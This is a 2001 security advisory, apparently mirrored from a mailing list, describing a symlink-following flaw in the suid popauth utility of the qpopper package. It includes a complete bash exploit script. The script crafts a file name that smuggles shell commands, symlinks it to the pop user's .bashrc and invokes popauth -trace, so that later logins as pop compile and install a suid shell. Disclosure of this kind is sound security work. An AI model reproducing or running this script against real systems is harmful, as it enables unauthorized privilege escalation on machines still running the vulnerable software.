NETSYS.COM - The Intelligent Hacker's Choice - http://www.netsys.com/library/alerts/exploits/popauth.txt

Date: 12/17/2001
From: Paul Starzetz
Subject: Advisory: popauth

Hi,

there is a symlink problem in the popauth utility, which is part of the qpopper package. The binary is often installed suid pop and follows symlinks in the -trace file option. This problem was reported to vendors in June 2001.

Impact: in case of suid popauth and a valid shell for user pop, the attached script will create a suid-pop shell if someone su's to pop. This may happen as part of some automated check script (startup script).

This vulnerability is not very crucial, however it should be reported at least once.

/ih

######### mkbs2.sh ###########
#!/bin/bash

# popauth symlink follow vuln by IhaQueR
# this will create .bashrc for user pop
# and ~pop/sup suid shell

FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \"#include \nmain(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""')

ln -s /var/lib/pop/.bashrc "$FILE"

/usr/sbin/popauth -trace "$FILE"
########## end #################